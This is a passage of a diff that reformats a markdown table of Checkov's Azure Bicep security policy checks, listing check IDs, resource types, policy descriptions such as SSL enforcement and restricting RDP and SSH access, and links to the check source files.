-| 33 | CKV_AZURE_25  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Threat Detection types' is set to 'All'                                                         | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                 |
-| 34 | CKV_AZURE_26  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                    | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                     |
-| 35 | CKV_AZURE_27  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                             | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                     |
-| 36 | CKV_AZURE_28  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                           |
-| 37 | CKV_AZURE_29  | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                           | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                 |
-| 38 | CKV_AZURE_30  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                 |
-| 39 | CKV_AZURE_30  | resource  | configurations                                                               | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                 |
-| 40 | CKV_AZURE_31  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                 |
-| 41 | CKV_AZURE_31  | resource  | configurations                                                               | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                 |
-| 42 | CKV_AZURE_32  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)     |
-| 43 | CKV_AZURE_32  | resource  | configurations                                                               | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)     |
-| 44 | CKV_AZURE_33  | resource  | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests                      | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)           |
-| 45 | CKV_AZURE_34  | resource  | Microsoft.Storage/storageAccounts/blobServices/containers                    | Ensure that 'Public access level' is set to Private for blob containers                                      | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)           |
-| 46 | CKV_AZURE_34  | resource  | blobServices/containers                                                      | Ensure that 'Public access level' is set to Private for blob containers                                      | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)           |
-| 47 | CKV_AZURE_34  | resource  | containers                                                                   | Ensure that 'Public access level' is set to Private for blob containers                                      | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)           |
-| 48 | CKV_AZURE_35  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure default network access rule for Storage Accounts is set to deny                                       | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)       |
-| 49 | CKV_AZURE_36  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                    | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)   |
-| 50 | CKV_AZURE_37  | resource  | Microsoft.Insights/logprofiles                                               | Ensure that Activity Log Retention is set 365 days or greater                                                | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                               |
-| 51 | CKV_AZURE_38  | resource  | Microsoft.Insights/logprofiles                                               | Ensure audit profile captures all the activities                                                             | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                     |
-| 52 | CKV_AZURE_39  | resource  | Microsoft.Authorization/roleDefinitions                                      | Ensure that no custom subscription owner roles are created                                                   | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                 |
-| 53 | CKV_AZURE_40  | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that the expiration date is set on all keys                                                           | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                         |
-| 54 | CKV_AZURE_41  | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that the expiration date is set on all secrets                                                        | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                   |
-| 55 | CKV_AZURE_42  | resource  | Microsoft.KeyVault/vaults                                                    | Ensure the key vault is recoverable                                                                          | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                             |
-| 56 | CKV_AZURE_47  | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                      | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                   |
-| 57 | CKV_AZURE_49  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                          | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                 |
-| 58 | CKV_AZURE_50  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Virtual Machine Extensions are not Installed                                                          | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                             |
-| 59 | CKV_AZURE_58  | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Azure Synapse workspaces enables managed virtual networks                                        | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
-| 60 | CKV_AZURE_59  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that Storage accounts disallow public access                                                          | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                         |
-| 61 | CKV_AZURE_63  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables HTTP logging                                                                 | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                   |
-| 62 | CKV_AZURE_65  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables detailed error messages                                                      | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)               |
-| 63 | CKV_AZURE_66  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables failed request tracing                                                       | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                 |
-| 64 | CKV_AZURE_80  | resource  | Microsoft.Web/sites/config                                                   | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                          | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                           |
-| 65 | CKV_AZURE_88  | resource  | Microsoft.Web/sites/config                                                   | Ensure that app services use Azure Files                                                                     | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                           |
-| 66 | CKV_AZURE_89  | resource  | Microsoft.Cache/redis                                                        | Ensure that Azure Cache for Redis disables public network access                                             | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                   |
-| 67 | CKV_AZURE_93  | resource  | Microsoft.Compute/disks                                                      | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                 |
-| 68 | CKV_AZURE_94  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that My SQL server enables geo-redundant backups                                                      | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                 |
-| 69 | CKV_AZURE_95  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                            | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                 |
-| 70 | CKV_AZURE_96  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that MySQL server enables infrastructure encryption                                                   | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                               |
-| 71 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine scale sets have encryption at host enabled                                       | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                         |
-| 72 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine scale sets have encryption at host enabled                                       | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                         |
-| 73 | CKV_AZURE_100 | resource  | Microsoft.DocumentDb/databaseAccounts                                        | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                            | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                             |
-| 74 | CKV_AZURE_101 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure that Azure Cosmos DB disables public network access                                                   | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                 |
-| 75 | CKV_AZURE_103 | resource  | Microsoft.DataFactory/factories                                              | Ensure that Azure Data Factory uses Git repository for source control                                        | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                   |
-| 76 | CKV_AZURE_107 | resource  | Microsoft.ApiManagement/service                                              | Ensure that API management services use virtual networks                                                     | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                   |
-| 77 | CKV_AZURE_109 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault allows firewall rules settings                                                         | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                   |
-| 78 | CKV_AZURE_111 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault enables soft delete                                                                    | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                         |
-| 79 | CKV_AZURE_112 | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that key vault key is backed by HSM                                                                   | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                               |
-| 80 | CKV_AZURE_113 | resource  | Microsoft.Sql/servers                                                        | Ensure that SQL server disables public network access                                                        | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                           |
-| 81 | CKV_AZURE_114 | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that key vault secrets have "content_type" set                                                        | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                         |
-| 82 | CKV_AZURE_121 | resource  | Microsoft.Network/frontDoors                                                 | Ensure that Azure Front Door enables WAF                                                                     | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                           |
-| 83 | CKV_AZURE_123 | resource  | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                    | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                   | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                     |
-| 84 | CKV_AZURE_130 | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server enables infrastructure encryption                                              | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                     |
-| 85 | CKV_AZURE_131 | parameter | string                                                                       | SecureString parameter should not have hardcoded default values                                              | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py)            |
-| 86 | CKV_AZURE_132 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                 | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                 |
-| 87 | CKV_AZURE_134 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that Cognitive Services accounts disable public network access                                        | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)               |
-| 88 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine does not enable password authentication                                          | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                             |
-| 89 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine does not enable password authentication                                          | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                             |
-| 90 | CKV_AZURE_151 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Windows VM enables encryption                                                                         | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                 |
-| 91 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that HTTP (port 80) access is restricted from the internet                                            | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                     |
-| 92 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that HTTP (port 80) access is restricted from the internet                                            | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                     |
-| 93 | CKV_AZURE_216 | resource  | Microsoft.Network/azureFirewalls                                             | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                      | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                           |
-| 94 | CKV_AZURE_236 | resource  | Microsoft.Storage/storageAccounts                                            | Ensure Storage Account is using the latest version of TLS encryption                                         | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                             |
-| 95 | CKV2_AZURE_27 | resource  | Microsoft.Sql/servers                                                        | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                              | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                     |
+|     | Id            | Type      | Entity                                                                       | Policy                                                                                                       | IaC   | Resource Link                                                                                                                                                                                                |
+|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+|   0 | CKV_AZURE_1   | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                 | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                                           |
+|   1 | CKV_AZURE_2   | resource  | Microsoft.Compute/disks                                                      | Ensure Azure managed disk have encryption enabled                                                            | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                                                 |
+|   2 | CKV_AZURE_3   | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                      | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py)                                         |
+|   3 | CKV_AZURE_4   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS logging to Azure Monitoring is Configured                                                         | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                                                   |
+|   4 | CKV_AZURE_5   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure RBAC is enabled on AKS clusters                                                                       | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                                                         |
+|   5 | CKV_AZURE_6   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS has an API Server Authorized IP Ranges enabled                                                    | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                                                         |
+|   6 | CKV_AZURE_7   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS cluster has Network Policy configured                                                             | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                                                     |
+|   7 | CKV_AZURE_8   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Kubernetes Dashboard is disabled                                                                      | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                                             |
+|   8 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that RDP access is restricted from the internet                                                       | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                 |
+|   9 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that RDP access is restricted from the internet                                                       | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                 |
+|  10 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that SSH access is restricted from the internet                                                       | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                 |
+|  11 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that SSH access is restricted from the internet                                                       | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                 |
+|  12 | CKV_AZURE_11  | resource  | Microsoft.Sql/servers                                                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                                                       |
+|  13 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  14 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  15 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  16 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  17 | CKV_AZURE_13  | resource  | Microsoft.Web/sites/config                                                   | Ensure App Service Authentication is set on Azure App Service                                                | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                     |
+|  18 | CKV_AZURE_13  | resource  | config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                     |
+|  19 | CKV_AZURE_14  | resource  | Microsoft.Web/sites                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                      | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                                               |
+|  20 | CKV_AZURE_15  | resource  | Microsoft.Web/sites                                                          | Ensure web app is using the latest version of TLS encryption                                                 | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                                                       |
+|  21 | CKV_AZURE_16  | resource  | Microsoft.Web/sites                                                          | Ensure that Register with Azure Active Directory is enabled on App Service                                   | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                                                 |
+|  22 | CKV_AZURE_17  | resource  | Microsoft.Web/sites                                                          | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                              | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                                               |
+|  23 | CKV_AZURE_18  | resource  | Microsoft.Web/sites                                                          | Ensure that 'HTTP Version' is the latest if used to run the web app                                          | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                                                     |
+|  24 | CKV_AZURE_19  | resource  | Microsoft.Security/pricings                                                  | Ensure that standard pricing tier is selected                                                                | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                                           |
+|  25 | CKV_AZURE_20  | resource  | Microsoft.Security/securityContacts                                          | Ensure that security contact 'Phone number' is set                                                           | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                                                 |
+|  26 | CKV_AZURE_21  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                                                       |
+|  27 | CKV_AZURE_22  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                                           |
+|  28 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                           |
+|  29 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/auditingSettings                                       | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                           |
+|  30 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                           |
+|  31 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/databases/auditingSettings                             | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                           |
+|  32 | CKV_AZURE_24  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                   | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml)                                           |
